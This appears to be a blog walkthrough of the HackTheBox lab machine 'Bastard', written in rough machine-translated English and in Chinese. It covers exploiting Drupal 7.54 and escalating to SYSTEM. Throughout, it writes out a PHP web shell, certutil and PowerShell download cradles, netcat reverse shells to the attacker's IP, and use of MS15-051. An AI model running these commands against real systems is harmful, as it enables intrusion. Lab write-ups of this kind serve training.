**
HackTheBox-windows-Bastard-Walkthrough
**
Drone address: https: //www.hackthebox.eu/home/machines/profile/6
drone Difficulty: Medium (4.7 / 10)
drone Release Date: October 14, 2017
drone description:
Bastard IS not Overly challenging, however it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry This machine demonstrates the potential severity of vulnerabilities in content management systems..
author: Dayu
time: 2020-02-13
Note : for all of these computers, I was authorized by the platform allow penetration of the situation. I will use Kali Linux as a solution to the attacker's machine that HTB. Here the use of technology for learning for educational purposes only, if the technology is listed for any other goal, I will not be responsible.
First, information collection
You can see the drone of IP is 10.10.10.9, windows system drone ...
nmap found only open 80,135,49154 (msrpc) port ...
you can see this is a Drupal 7 CMS architecture of the web server ... CHANGELOG.txt files can view information about the exact release Drupal CMS, etc. ... to see
whatweb can be seen ...
you can see version is Drupal 7.54 ...
use searchsploit -x 41564.phpyou can find that can take advantage of ...
7.54 I were here for drupal 7.x modules using the service ...
command : ./droopescan scan drupal -u 10.10.10.9(server hostile to me, or the Friends of people in trouble, I often unstable network)
where I also use a script droopescan the machine drupal scan to see if there are areas available ... link
to continue to back the use of 41564. ... php script using the script into local, under modified ...
Code: echo(system($_GET["cmd"]))or system($_REQUEST["cmd"]
execution must be installed: apt-get install php-curl
here to start using the rest_endpoint unsuccessful, then use the rest after the success of the ... main dirb discovered the existence of rest directory ...
DIRB found rest visit also found success ...
successful implementation and won session.json and user.json ...
you can see me before Php execution time, the error several times, a few times I debugging, there are two small areas need to be adjusted under ...
two places need to be adjusted ... or else an error ...
you can see that the successful implementation of ...
Can be seen by cmd php can already read the written information of the other windows ...
here need to use sessions.json files for session hijacking ...
you can also see that this is the X64 system ...
Add to ...
you can see admin user has landed interface ...
here I currently know two methods shellcode can be uploaded to the target ...
Non-standard application layer protocol
In the communication using the non-standard application layer protocol between the remote control between the host server and the host or a different protocol may be used very much, specific examples including the use of network layer protocol, such as Internet Control Message Protocol (the Internet Control Message protocol, ICMP), transport layer protocol, such as user datagram protocol (the user datagram protocol, UDP), session layer protocol, such as secure socket protocols (the SOCKS), and redirection / tunneling protocols, such as serial protocol on the LAN (Serial over LAN, SOL).
Use ICMP communication between the host, because ICMP is part of the Internet protocol suite (the Internet Protocol Suite), all the IP-compatible hosts are able to achieve ICMP protocol. But it is not being monitored as TCP, UDP, and other network protocols, so it can be used by an attacker to hide traffic .
Please understand that the next act ...
method 1:
By certulti download nc
mFuZ3poZW5naGVpdGk, shadow_10, text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0ODAxNzQ1, size_16, color_FFFFFF, t_70)
command: http://10.10.10.9/dayuxiyou.php?cmd=certutil%20-urlcache%20-f%20http://10.10.14.16:8000/nc64.exe nc64.exe
successfully downloaded to the windows ...
command: http://10.10.10.9/dayuxiyou.php?cmd=certutil -urlcache -f http://10.10.10.9/nc64.exe nc64.exe
successful reverse shell ...
Method 2:
利用编写php进行…
配置了执行请求dayu,然后下载是fupload…
命令:
$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.16:8000/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['dayu'])) {
echo "<pre>" . shell_exec($_REQUEST['dayu']) . "</pre>";
};
?>
EOD;
$file = [
'filename' => 'dayuxiyou.php',
'data' => $phpCode
];
检查php执行正常…
重新运行…
命令:http://10.10.10.9/dayuxiyou.php?fupload=nc64.exe (上传nc.exe)
命令:http://10.10.10.9/dayuxiyou.php?dayu=nc64.exe&dayu=nc64.exe -e cmd 10.10.14.16 6001
成功获得反向shell…
方法3:
利用kali自带的smbserver,并进行共享…
locate smbserver.py查找…
命令:python /root/Desktop/dayuBastard/smbserver.py dayugongxiang /var/www/html/
开启共享文件,dayugongxiang ,然后html目录下放了nc64.exe或者nc.exe即可…
命令:10.10.10.9/dayuxiyou.php?dayu=copy \\10.10.14.16\dayugongxiang\nc64.exe nc64.exe
可以看到已经成功复制文件进去…
成功获得反向shell…
方法4:
利用官方介绍的方法进行提权…
可以通过在“模块”页面上启用PHP筛选器模块来实现PHP执行。 之后,只需浏览至添加内容,然后至文章。 将PHP粘贴到文章正文中,将“文本”格式更改为PHP代码,然后单击“预览”可以轻松执行代码。----官方翻译…
在Modules找到了PHP模块,默认是没勾上的,勾上save即可…
PHP代码提权:链接
然后预览即可…
仅仅通过这种方式就拥有了管理员…使用起来更简单,但这也是官方给的一种方法…
使用Powershell Empire-PowerUp.ps1
PowerShell Empire是用于运行Microsoft Windows和/或Windows Server操作系统的计算机和服务器的开发后框架…
注意:PowerUp.ps1可以在windows内部运行,因此我们需要在文件“ Invoke-AllChecks”的底部添加并保存…
命令:http://10.10.10.9/dayuxiyou.php?dayu=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/PowerUp.ps1') | powershell -noprofile -
然后利用PowerShell上传执行PowerUp.ps1…
过了几分钟,查看结果,可以看到访问被拒绝,说明没有管理员权限…
使用Powershell Empire-Sherlock.ps1
Sherlock.ps1脚本用于快速查找缺少的软件补丁,发现并解决本地特权升级漏洞…
使用sherlock.ps1查找漏洞…
需要使用Find-AllVulns编辑文件,在文件末尾添加即可…
命令:/root/.local/share/Trash/files/Sherlock/Sherlock.ps1
命令:http://10.10.10.9/dayuxiyou.php?dayu=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/Sherlock.ps1') | powershell -noprofile -
Appears Vulnerable就是存在漏洞…可以利用…这边找找
在扫描出来的结果中,只发现了ms10-092、ms15-051、ms16-032漏洞可以利用…
Sherlock.ps1脚本发现利用exe链接
下载地址上面已经给了…
利用ms15-051x64.exe…
成功获得user.txt
成功获得root.txt
certutil:
命令:certutil -urlcache -f http://10.10.14.16:8000/ms15-051x64.exe dayucertutil.exe
命令:dayucertutil.exe "nc.exe 10.10.14.16 6006 -e cmd.exe"
php提权:
上传ms15-051.exe不支持“-”…在本地改下名称…
成功输出命令…
命令:http://10.10.10.9/dayuxiyou.php?fupload=dayums.exe&dayu=dayums.exe "nc64.exe -e cmd 10.10.14.16 6007"
成功提权…
smbserver:
Smbserver shared directory using the successful operation ... provide the right to obtain information root.txt ... (root information is not published ... self-learning refueling)
Here the use of four different methods windows drone penetration ... I will come up with the spirit of the late hundred percent, hundred percent effort to carry out a variety of ways to infiltrate every drone, I can think we'll do ... this method lets hope I remember way deeper, come on! !
You can see there's still a lot of useless information to write out the excavation itself, ms16-032 ms10-092 two possible exploits did not write, I tried it found to be feasible, we need to generate a by MSF EXE, then was placed on the windows desktop sharing, and then mention the right to use ...
To continue to generate ideas, no matter how crazy they are far-fetched and experience, use your brain gray matter to build new associations for them.
I hope someone can and I do not have to share ways to win this drone! ! !
Since we have been successful root permissions to view user.txt and root.txt, thus completing the simple drone, I hope you like this machine, please continue to focus on large there will be late more challenging than the machine, along with exercises to learn.
If you have other methods of welcome message. If there wrong place, you must tell me. If you find this blog to write good, welcome to share the people around.
